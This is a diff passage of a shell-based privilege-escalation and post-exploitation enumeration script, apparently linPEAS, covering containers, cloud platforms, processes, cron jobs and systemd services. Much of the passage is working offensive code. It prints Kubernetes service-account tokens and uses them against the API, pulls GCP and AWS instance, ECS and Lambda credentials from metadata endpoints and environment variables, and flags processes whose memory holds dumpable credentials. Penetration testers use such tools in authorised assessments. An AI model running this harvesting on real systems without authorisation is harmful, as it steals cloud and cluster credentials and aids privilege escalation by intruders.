+ if echo "$containerType" | grep -qi "kubernetes"; then
+ print_list "Kubernetes namespace ...........$NC $(cat /run/secrets/kubernetes.io/serviceaccount/namespace /var/run/secrets/kubernetes.io/serviceaccount/namespace /secrets/kubernetes.io/serviceaccount/namespace 2>/dev/null)\n"
+ print_list "Kubernetes token ...............$NC $(cat /run/secrets/kubernetes.io/serviceaccount/token /var/run/secrets/kubernetes.io/serviceaccount/token /secrets/kubernetes.io/serviceaccount/token 2>/dev/null)\n"
+ echo ""
+
+ print_2title "Kubernetes Information"
+ print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod"
+
+
+ print_3title "Kubernetes service account folder"
+ ls -lR /run/secrets/kubernetes.io/ /var/run/secrets/kubernetes.io/ /secrets/kubernetes.io/ 2>/dev/null
+ echo ""
+
+ print_3title "Kubernetes env vars"
+ (env | set) | grep -Ei "kubernetes|kube" | grep -Ev "^WF=|^Wfolders=|^mounted=|^USEFUL_SOFTWARE='|^INT_HIDDEN_FILES=|^containerType="
+ echo ""
+
+ print_3title "Current sa user k8s permissions"
+ print_info "https://book.hacktricks.xyz/cloud-security/pentesting-kubernetes/hardening-roles-clusterroles"
+ kubectl auth can-i --list 2>/dev/null || curl -s -k -d "$(echo \"eyJraW5kIjoiU2VsZlN1YmplY3RSdWxlc1JldmlldyIsImFwaVZlcnNpb24iOiJhdXRob3JpemF0aW9uLms4cy5pby92MSIsIm1ldGFkYXRhIjp7ImNyZWF0aW9uVGltZXN0YW1wIjpudWxsfSwic3BlYyI6eyJuYW1lc3BhY2UiOiJlZXZlZSJ9LCJzdGF0dXMiOnsicmVzb3VyY2VSdWxlcyI6bnVsbCwibm9uUmVzb3VyY2VSdWxlcyI6bnVsbCwiaW5jb21wbGV0ZSI6ZmFsc2V9fQo=\"|base64 -d)" \
+ "https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT_HTTPS}/apis/authorization.k8s.io/v1/selfsubjectrulesreviews" \
+ -X 'POST' -H 'Content-Type: application/json' \
+ --header "Authorization: Bearer $(cat /var/run/secrets/kubernetes.io/serviceaccount/token)" | sed "s,secrets|exec|create|patch|impersonate|\"*\",${SED_RED},"
+
+ fi
+ echo ""
+
+ print_2title "Container Capabilities"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation#capabilities-abuse-escape"
+ if [ "$(command -v capsh)" ]; then
+ capsh --print 2>/dev/null | sed -${E} "s,$containercapsB,${SED_RED},g"
+ else
+ cat /proc/self/status | grep Cap | sed -${E} "s, .*,${SED_RED},g" | sed -${E} "s,0000000000000000|00000000a80425fb,${SED_GREEN},g"
+ fi
+ echo ""
+
+ print_2title "Privilege Mode"
+ if [ -x "$(command -v fdisk)" ]; then
+ if [ "$(fdisk -l 2>/dev/null | wc -l)" -gt 0 ]; then
+ echo "Privilege Mode is enabled"| sed -${E} "s,enabled,${SED_RED_YELLOW},"
+ else
+ echo "Privilege Mode is disabled"| sed -${E} "s,disabled,${SED_GREEN},"
+ fi
+ else
+ echo_not_found
+ fi
+ echo ""
+
+ print_2title "Interesting Files Mounted"
+ (mount -l || cat /proc/self/mountinfo || cat /proc/1/mountinfo || cat /proc/mounts || cat /proc/self/mounts || cat /proc/1/mounts )2>/dev/null | grep -Ev "$GREP_IGNORE_MOUNTS" | sed -${E} "s,.sock,${SED_RED}," | sed -${E} "s,docker.sock,${SED_RED_YELLOW}," | sed -${E} "s,/dev/,${SED_RED},g"
+ echo ""
+
+ print_2title "Possible Entrypoints"
+ ls -lah /*.sh /*entrypoint* /**/entrypoint* /**/*.sh /deploy* 2>/dev/null | sort | uniq
+ echo ""
+fi
+
+fi
+echo ''
+echo ''
+if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
+
+if echo $CHECKS | grep -q cloud; then
+print_title "Cloud"
+###########################################
+#-----------) Cloud functions (-----------#
+###########################################
+
+GCP_GOOD_SCOPES="/devstorage.read_only|/logging.write|/monitoring|/servicecontrol|/service.management.readonly|/trace.append"
+GCP_BAD_SCOPES="/cloud-platform|/compute"
+
+exec_with_jq(){
+ if [ "$(command -v jq)" ]; then
+ $@ | jq;
+ else
+ $@;
+ fi
+}
+
+check_gcp(){
+ is_gcp="No"
+ if grep -q metadata.google.internal /etc/hosts 2>/dev/null || (curl --connect-timeout 2 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 metadata.google.internal >/dev/null 2>&1 && [ "$?" -eq "0" ]); then
+ is_gcp="Yes"
+ fi
+}
+
+check_aws_ecs(){
+ is_aws_ecs="No"
+ if (env | grep -q ECS_CONTAINER_METADATA_URI_v4); then
+ is_aws_ecs="Yes";
+ aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI_v4;
+ aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+
+ elif (env | grep -q ECS_CONTAINER_METADATA_URI); then
+ is_aws_ecs="Yes";
+ aws_ecs_metadata_uri=$ECS_CONTAINER_METADATA_URI;
+ aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+
+ elif (env | grep -q AWS_CONTAINER_CREDENTIALS_RELATIVE_URI); then
+ is_aws_ecs="Yes";
+
+
+ elif (curl --connect-timeout 2 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]) || (wget --timeout 2 --tries 1 "http://169.254.170.2/v2/credentials/" >/dev/null 2>&1 && [ "$?" -eq "0" ]); then
+ is_aws_ecs="Yes";
+
+ fi
+
+ if [ "$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" ]; then
+ aws_ecs_service_account_uri="http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI"
+ fi
+}
+
+check_aws_ec2(){
+ is_aws_ec2="No"
+
+ if [ -d "/var/log/amazon/" ]; then
+ is_aws_ec2="Yes"
+ EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
+
+ else
+ EC2_TOKEN=$(curl --connect-timeout 2 -X PUT "http://169.254.169.254/latest/api/token" -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null || wget --timeout 2 --tries 1 -q -O - --method PUT "http://169.254.169.254/latest/api/token" --header "X-aws-ec2-metadata-token-ttl-seconds: 21600" 2>/dev/null)
+ if [ "$(echo $EC2_TOKEN | cut -c1-2)" = "AQ" ]; then
+ is_aws_ec2="Yes"
+ fi
+ fi
+}
+
+check_aws_lambda(){
+ is_aws_lambda="No"
+
+ if (env | grep -q AWS_LAMBDA_); then
+ is_aws_lambda="Yes"
+ fi
+}
+
+
+check_gcp
+print_list "Google Cloud Platform? ............... $is_gcp\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_aws_ecs
+print_list "AWS ECS? ............................. $is_aws_ecs\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_aws_ec2
+print_list "AWS EC2? ............................. $is_aws_ec2\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+check_aws_lambda
+print_list "AWS Lambda? .......................... $is_aws_lambda\n"$NC | sed "s,Yes,${SED_RED}," | sed "s,No,${SED_GREEN},"
+
+echo ""
+
+if [ "$is_gcp" = "Yes" ]; then
+ gcp_req=""
+ if [ "$(command -v curl)" ]; then
+ gcp_req='curl -s -f -H "X-Google-Metadata-Request: True"'
+ elif [ "$(command -v wget)" ]; then
+ gcp_req='wget -q -O - --header "X-Google-Metadata-Request: True"'
+ else
+ echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+ fi
+
+
+ if [ "$gcp_req" ]; then
+ print_2title "Google CLoud Platform Enumeration"
+ print_info "https://book.hacktricks.xyz/cloud-security/gcp-security"
+
+ ## GC Project Info
+ p_id=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/project-id')
+ [ "$p_id" ] && echo "Project-ID: $p_id"
+ p_num=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/numeric-project-id')
+ [ "$p_num" ] && echo "Project Number: $p_num"
+ pssh_k=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/ssh-keys')
+ [ "$pssh_k" ] && echo "Project SSH-Keys: $pssh_k"
+ p_attrs=$(eval $gcp_req 'http://metadata.google.internal/computeMetadata/v1/project/attributes/?recursive=true')
+ [ "$p_attrs" ] && echo "All Project Attributes: $p_attrs"
+
+ # OSLogin Info
+ osl_u=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/users)
+ [ "$osl_u" ] && echo "OSLogin users: $osl_u"
+ osl_g=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/groups)
+ [ "$osl_g" ] && echo "OSLogin Groups: $osl_g"
+ osl_sk=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/security-keys)
+ [ "$osl_sk" ] && echo "OSLogin Security Keys: $osl_sk"
+ osl_au=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/oslogin/authorize)
+ [ "$osl_au" ] && echo "OSLogin Authorize: $osl_au"
+
+ # Instance Info
+ inst_d=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/description)
+ [ "$inst_d" ] && echo "Instance Description: "
+ inst_hostn=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/hostname)
+ [ "$inst_hostn" ] && echo "Hostname: $inst_hostn"
+ inst_id=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/id)
+ [ "$inst_id" ] && echo "Instance ID: $inst_id"
+ inst_img=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/image)
+ [ "$inst_img" ] && echo "Instance Image: $inst_img"
+ inst_mt=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/machine-type)
+ [ "$inst_mt" ] && echo "Machine Type: $inst_mt"
+ inst_n=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/name)
+ [ "$inst_n" ] && echo "Instance Name: $inst_n"
+ inst_tag=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/scheduling/tags)
+ [ "$inst_tag" ] && echo "Instance tags: $inst_tag"
+ inst_zone=$(eval $gcp_req http://metadata.google.internal/computeMetadata/v1/instance/zone)
+ [ "$inst_zone" ] && echo "Zone: $inst_zone"
+
+ inst_k8s_loc=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-location")
+ [ "$inst_k8s_loc" ] && echo "K8s Cluster Location: $inst_k8s_loc"
+ inst_k8s_name=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/cluster-name")
+ [ "$inst_k8s_name" ] && echo "K8s Cluster name: $inst_k8s_name"
+ inst_k8s_osl_e=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/enable-oslogin")
+ [ "$inst_k8s_osl_e" ] && echo "K8s OSLoging enabled: $inst_k8s_osl_e"
+ inst_k8s_klab=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-labels")
+ [ "$inst_k8s_klab" ] && echo "K8s Kube-labels: $inst_k8s_klab"
+ inst_k8s_kubec=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kubeconfig")
+ [ "$inst_k8s_kubec" ] && echo "K8s Kubeconfig: $inst_k8s_kubec"
+ inst_k8s_kubenv=$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/attributes/kube-env")
+ [ "$inst_k8s_kubenv" ] && echo "K8s Kube-env: $inst_k8s_kubenv"
+
+ echo ""
+ print_3title "Interfaces"
+ for iface in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/"); do
+ echo " IP: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/ip")
+ echo " Subnetmask: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/subnetmask")
+ echo " Gateway: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/gateway")
+ echo " DNS: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/dns-servers")
+ echo " Network: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/network-interfaces/$iface/network")
+ echo " ============== "
+ done
+
+ echo ""
+ print_3title "Service Accounts"
+ for sa in $(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/"); do
+ echo " Name: $sa"
+ echo " Email: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/email")
+ echo " Aliases: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/aliases")
+ echo " Identity: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/identity")
+ echo " Scopes: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/scopes") | sed -${E} "s,${GCP_GOOD_SCOPES},${SED_GREEN},g" | sed -${E} "s,${GCP_BAD_SCOPES},${SED_RED},g"
+ echo " Token: "$(eval $gcp_req "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/$sa/token")
+ echo " ============== "
+ done
+ fi
+fi
+
+
+if [ "$is_aws_ecs" = "Yes" ]; then
+ print_2title "AWS ECS Enumeration"
+
+ aws_ecs_req=""
+ if [ "$(command -v curl)" ]; then
+ aws_ecs_req='curl -s -f'
+ elif [ "$(command -v wget)" ]; then
+ aws_ecs_req='wget -q -O -'
+ else
+ echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+ fi
+
+ if [ "$aws_ecs_metadata_uri" ]; then
+ print_3title "Container Info"
+ exec_with_jq $aws_ecs_req "$aws_ecs_metadata_uri"
+ echo ""
+
+ print_3title "Task Info"
+ exec_with_jq $aws_ecs_req "$aws_ecs_metadata_uri/task"
+ echo ""
+ else
+ echo "I couldn't find ECS_CONTAINER_METADATA_URI env var to get container info"
+ fi
+
+ if [ "$aws_ecs_service_account_uri" ]; then
+ print_3title "IAM Role"
+ exec_with_jq $aws_ecs_req "$aws_ecs_service_account_uri"
+ echo ""
+ else
+ echo "I couldn't find AWS_CONTAINER_CREDENTIALS_RELATIVE_URI env var to get IAM role info (the task is running without a task role probably)"
+ fi
+fi
+
+if [ "$is_aws_ec2" = "Yes" ]; then
+ print_2title "AWS EC2 Enumeration"
+
+ HEADER="X-aws-ec2-metadata-token: $EC2_TOKEN"
+ URL="http://169.254.169.254/latest/meta-data"
+
+ aws_req=""
+ if [ "$(command -v curl)" ]; then
+ aws_req='curl -s -f -H "$HEADER"'
+ elif [ "$(command -v wget)" ]; then
+ aws_req='wget -q -O - -H "$HEADER"'
+ else
+ echo "Neither curl nor wget were found, I can't enumerate the metadata service :("
+ fi
+
+ if [ "$aws_req" ]; then
+ printf "ami-id: "; $aws_req "$URL/ami-id"; echo ""
+ printf "instance-action: "; $aws_req "$URL/instance-action"; echo ""
+ printf "instance-id: "; $aws_req "$URL/instance-id"; echo ""
+ printf "instance-life-cycle: "; $aws_req "$URL/instance-life-cycle"; echo ""
+ printf "instance-type: "; $aws_req "$URL/instance-type"; echo ""
+ printf "region: "; $aws_req "$URL/placement/region"; echo ""
+
+ echo ""
+ print_3title "Account Info"
+ exec_with_jq $aws_req "$URL/identity-credentials/ec2/info"; echo ""
+
+ echo ""
+ print_3title "Network Info"
+ for mac in $($aws_req "$URL/network/interfaces/macs/" 2>/dev/null); do
+ echo "Mac: $mac"
+ printf "Owner ID: "; $aws_req "$URL/network/interfaces/macs/$mac/owner-id"; echo ""
+ printf "Public Hostname: "; $aws_req "$URL/network/interfaces/macs/$mac/public-hostname"; echo ""
+ printf "Security Groups: "; $aws_req "$URL/network/interfaces/macs/$mac/security-groups"; echo ""
+ echo "Private IPv4s:"; $aws_req "$URL/network/interfaces/macs/$mac/ipv4-associations/"; echo ""
+ printf "Subnet IPv4: "; $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv4-cidr-block"; echo ""
+ echo "PrivateIPv6s:"; $aws_req "$URL/network/interfaces/macs/$mac/ipv6s"; echo ""
+ printf "Subnet IPv6: "; $aws_req "$URL/network/interfaces/macs/$mac/subnet-ipv6-cidr-blocks"; echo ""
+ echo "Public IPv4s:"; $aws_req "$URL/network/interfaces/macs/$mac/public-ipv4s"; echo ""
+ echo ""
+ done
+
+ echo ""
+ print_3title "IAM Role"
+ exec_with_jq $aws_req "$URL/iam/info"; echo ""
+ for role in $($aws_req "$URL/iam/security-credentials/" 2>/dev/null); do
+ echo "Role: $role"
+ exec_with_jq $aws_req "$URL/iam/security-credentials/$role"; echo ""
+ echo ""
+ done
+
+ echo ""
+ print_3title "User Data"
+ $aws_req "http://169.254.169.254/latest/user-data"
+ fi
+fi
+
+if [ "$is_aws_lambda" = "Yes" ]; then
+ print_2title "AWS Lambda Enumeration"
+ printf "Function name: "; env | grep AWS_LAMBDA_FUNCTION_NAME
+ printf "Region: "; env | grep AWS_REGION
+ printf "Secret Access Key: "; env | grep AWS_SECRET_ACCESS_KEY
+ printf "Access Key ID: "; env | grep AWS_ACCESS_KEY_ID
+ printf "Session token: "; env | grep AWS_SESSION_TOKEN
+ printf "Security token: "; env | grep AWS_SECURITY_TOKEN
+ printf "Runtime API: "; env | grep AWS_LAMBDA_RUNTIME_API
+ printf "Event data: "; (curl -s "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" 2>/dev/null || wget -q -O - "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next")
+fi
+
+
+fi
+echo ''
+echo ''
+if [ "$WAIT" ]; then echo "Press enter to continue"; read "asd"; fi
+
+if echo $CHECKS | grep -q procs_crons_timers_srvcs_sockets; then
+print_title "Processes, Crons, Timers, Services and Sockets"
+
+####################################################
+#-----) Processes & Cron & Services & Timers (-----#
+####################################################
+
+#-- PCS) Cleaned proccesses
+print_2title "Cleaned processes"
+if [ "$NOUSEPS" ]; then
+ printf ${BLUE}"[i]$GREEN Looks like ps is not finding processes, going to read from /proc/ and not going to monitor 1min of processes\n"$NC
+fi
+print_info "Check weird & unexpected proceses run by root: https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
+
+if [ "$NOUSEPS" ]; then
+ print_ps | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
+ pslist=$(print_ps)
+else
+ (ps fauxwww || ps auxwww | sort ) 2>/dev/null | grep -v "\[" | grep -v "%CPU" | while read psline; do
+ echo "$psline" | sed -${E} "s,$Wfolders,${SED_RED},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$rootcommon,${SED_GREEN}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed "s,root,${SED_RED}," | sed -${E} "s,$processesVB,${SED_RED_YELLOW},g" | sed "s,$processesB,${SED_RED}," | sed -${E} "s,$processesDump,${SED_RED},"
+ if [ "$(command -v capsh)" ] && ! echo "$psline" | grep -q root; then
+ cpid=$(echo "$psline" | awk '{print $2}')
+ caphex=0x"$(cat /proc/$cpid/status 2> /dev/null | grep CapEff | awk '{print $2}')"
+ if [ "$caphex" ] && [ "$caphex" != "0x" ] && echo "$caphex" | grep -qv '0x0000000000000000'; then
+ printf " └─(${DG}Caps${NC}) "; capsh --decode=$caphex 2>/dev/null | grep -v "WARNING:" | sed -${E} "s,$capsB,${SED_RED},g"
+ fi
+ fi
+ done
+ pslist=$(ps auxwww)
+ echo ""
+
+ #-- PCS) Binary processes permissions
+ print_2title "Binary processes permissions (non 'root root' and not belonging to current user)"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#processes"
+ binW="IniTialiZZinnggg"
+ ps auxwww 2>/dev/null | awk '{print $11}' | while read bpath; do
+ if [ -w "$bpath" ]; then
+ binW="$binW|$bpath"
+ fi
+ done
+ ps auxwww 2>/dev/null | awk '{print $11}' | xargs ls -la 2>/dev/null |awk '!x[$0]++' 2>/dev/null | grep -v " root root " | grep -v " $USER " | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$binW,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_RED}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed -${E} "s,$knw_usrs,${SED_GREEN}," | sed "s,$USER,${SED_RED}," | sed "s,root,${SED_GREEN},"
+fi
+echo ""
+
+#-- PCS) Files opened by processes belonging to other users
+if ! [ "$IAMROOT" ]; then
+ print_2title "Files opened by processes belonging to other users"
+ print_info "This is usually empty because of the lack of privileges to read other user processes information"
+ lsof 2>/dev/null | grep -v "$USER" | grep -iv "permission denied" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+ echo ""
+fi
+
+#-- PCS) Processes with credentials inside memory
+print_2title "Processes with credentials in memory (root req)"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#credentials-from-process-memory"
+if echo "$pslist" | grep -q "gdm-password"; then echo "gdm-password process found (dump creds from memory as root)" | sed "s,gdm-password process,${SED_RED},"; else echo_not_found "gdm-password"; fi
+if echo "$pslist" | grep -q "gnome-keyring-daemon"; then echo "gnome-keyring-daemon process found (dump creds from memory as root)" | sed "s,gnome-keyring-daemon,${SED_RED},"; else echo_not_found "gnome-keyring-daemon"; fi
+if echo "$pslist" | grep -q "lightdm"; then echo "lightdm process found (dump creds from memory as root)" | sed "s,lightdm,${SED_RED},"; else echo_not_found "lightdm"; fi
+if echo "$pslist" | grep -q "vsftpd"; then echo "vsftpd process found (dump creds from memory as root)" | sed "s,vsftpd,${SED_RED},"; else echo_not_found "vsftpd"; fi
+if echo "$pslist" | grep -q "apache2"; then echo "apache2 process found (dump creds from memory as root)" | sed "s,apache2,${SED_RED},"; else echo_not_found "apache2"; fi
+if echo "$pslist" | grep -q "sshd:"; then echo "sshd: process found (dump creds from memory as root)" | sed "s,sshd:,${SED_RED},"; else echo_not_found "sshd"; fi
+echo ""
+
+#-- PCS) Different processes 1 min
+if ! [ "$FAST" ] && ! [ "$SUPERFAST" ]; then
+ print_2title "Different processes executed during 1 min (interesting is low number of repetitions)"
+ print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#frequent-cron-jobs"
+ temp_file=$(mktemp)
+ if [ "$(ps -e -o command 2>/dev/null)" ]; then for i in $(seq 1 1250); do ps -e -o command >> "$temp_file" 2>/dev/null; sleep 0.05; done; sort "$temp_file" 2>/dev/null | uniq -c | grep -v "\[" | sed '/^.\{200\}./d' | sort -r -n | grep -E -v "\s*[1-9][0-9][0-9][0-9]"; rm "$temp_file"; fi
+ echo ""
+fi
+
+#-- PCS) Cron
+print_2title "Cron jobs"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#scheduled-cron-jobs"
+command -v crontab 2>/dev/null || echo_not_found "crontab"
+crontab -l 2>/dev/null | tr -d "\r" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+command -v incrontab 2>/dev/null || echo_not_found "incrontab"
+incrontab -l 2>/dev/null
+ls -alR /etc/cron* /var/spool/cron/crontabs /var/spool/anacron 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g"
+cat /etc/cron* /etc/at* /etc/anacrontab /var/spool/cron/crontabs/* /etc/incron.d/* /var/spool/incron/* 2>/dev/null | tr -d "\r" | grep -v "^#" | sed -${E} "s,$Wfolders,${SED_RED_YELLOW},g" | sed -${E} "s,$sh_usrs,${SED_LIGHT_CYAN}," | sed "s,$USER,${SED_LIGHT_MAGENTA}," | sed -${E} "s,$nosh_usrs,${SED_BLUE}," | sed "s,root,${SED_RED},"
+crontab -l -u "$USER" 2>/dev/null | tr -d "\r"
+ls -lR /usr/lib/cron/tabs/ /private/var/at/jobs /var/at/tabs/ /etc/periodic/ 2>/dev/null | sed -${E} "s,$cronjobsG,${SED_GREEN},g" | sed "s,$cronjobsB,${SED_RED},g" #MacOS paths
+atq 2>/dev/null
+echo ""
+
+if [ "$MACPEAS" ]; then
+ print_2title "Third party LaunchAgents & LaunchDemons"
+ print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#launchd"
+ ls -l /Library/LaunchAgents/ /Library/LaunchDaemons/ ~/Library/LaunchAgents/ ~/Library/LaunchDaemons/ 2>/dev/null
+ echo ""
+
+ print_2title "Writable System LaunchAgents & LaunchDemons"
+ find /System/Library/LaunchAgents/ /System/Library/LaunchDaemons/ /Library/LaunchAgents/ /Library/LaunchDaemons/ | grep ".plist" | while read f; do
+ program=""
+ program=$(defaults read "$f" Program 2>/dev/null)
+ if ! [ "$program" ]; then
+ program=$(defaults read /Library/LaunchDaemons/MonitorHelper.plist ProgramArguments | grep -Ev "^\(|^\)" | cut -d '"' -f 2)
+ fi
+ if [ -w "$program" ]; then
+ echo "$program" is writable | sed -${E} "s,.*,${SED_RED_YELLOW},";
+ fi
+ done
+ echo ""
+
+ print_2title "StartupItems"
+ print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#startup-items"
+ ls -l /Library/StartupItems/ /System/Library/StartupItems/ 2>/dev/null
+ echo ""
+
+ print_2title "Login Items"
+ print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#login-items"
+ osascript -e 'tell application "System Events" to get the name of every login item' 2>/dev/null
+ echo ""
+
+ print_2title "SPStartupItemDataType"
+ system_profiler SPStartupItemDataType
+ echo ""
+
+ print_2title "Emond scripts"
+ print_info "https://book.hacktricks.xyz/macos/macos-security-and-privilege-escalation#emond"
+ ls -l /private/var/db/emondClients
+ echo ""
+fi
+
+#-- PCS) Services
+if [ "$EXTRA_CHECKS" ]; then
+ print_2title "Services"
+ print_info "Search for outdated versions"
+ (service --status-all || service -e || chkconfig --list || rc-status || launchctl list) 2>/dev/null || echo_not_found "service|chkconfig|rc-status|launchctl"
+ echo ""
+fi
+
+#-- PSC) systemd PATH
+print_2title "Systemd PATH"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#systemd-path-relative-paths"
+systemctl show-environment 2>/dev/null | grep "PATH" | sed -${E} "s,$Wfolders\|\./\|\.:\|:\.,${SED_RED_YELLOW},g"
+WRITABLESYSTEMDPATH=$(systemctl show-environment 2>/dev/null | grep "PATH" | grep -E "$Wfolders")
+echo ""
+
+#-- PSC) .service files
+#TODO: .service files in MACOS are folders
+print_2title "Analyzing .service files"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#services"
+printf "%s\n" "$PSTORAGE_SYSTEMD" | while read s; do
+ if [ ! -O "$s" ]; then #Remove services that belongs to the current user
+ if ! [ "$IAMROOT" ] && [ -w "$s" ] && [ -f "$s" ]; then
+ echo "$s" | sed -${E} "s,.*,${SED_RED_YELLOW},g"
+ fi
+ servicebinpaths=$(grep -Eo '^Exec.*?=[!@+-]*[a-zA-Z0-9_/\-]+' "$s" 2>/dev/null | cut -d '=' -f2 | sed 's,^[@\+!-]*,,') #Get invoked paths
+ printf "%s\n" "$servicebinpaths" | while read sp; do
+ if [ -w "$sp" ]; then
+ echo "$s is calling this writable executable: $sp" | sed "s,writable.*,${SED_RED_YELLOW},g"
+ fi
+ done
+ relpath1=$(grep -E '^Exec.*=(?:[^/]|-[^/]|\+[^/]|![^/]|!![^/]|)[^/@\+!-].*' "$s" 2>/dev/null | grep -Iv "=/")
+ relpath2=$(grep -E '^Exec.*=.*/bin/[a-zA-Z0-9_]*sh ' "$s" 2>/dev/null | grep -Ev "/[a-zA-Z0-9_]+/")
+ if [ "$relpath1" ] || [ "$relpath2" ]; then
+ if [ "$WRITABLESYSTEMDPATH" ]; then
+ echo "$s is executing some relative path" | sed -${E} "s,.*,${SED_RED},";
+ else
+ echo "$s is executing some relative path"
+ fi
+ fi
+ fi
+done
+if [ ! "$WRITABLESYSTEMDPATH" ]; then echo "You can't write on systemd PATH" | sed -${E} "s,.*,${SED_GREEN},"; fi
+echo ""
+
+#-- PSC) Timers
+print_2title "System timers"
+print_info "https://book.hacktricks.xyz/linux-hardening/privilege-escalation#timers"
+(systemctl list-timers --all 2>/dev/null | grep -Ev "(^$|timers listed)" | sed -${E} "s,$timersG,${SED_GREEN},") || echo_not_found
+echo ""
+
+#-- PSC) .timer files
+print_2title "Analyzing .timer files"
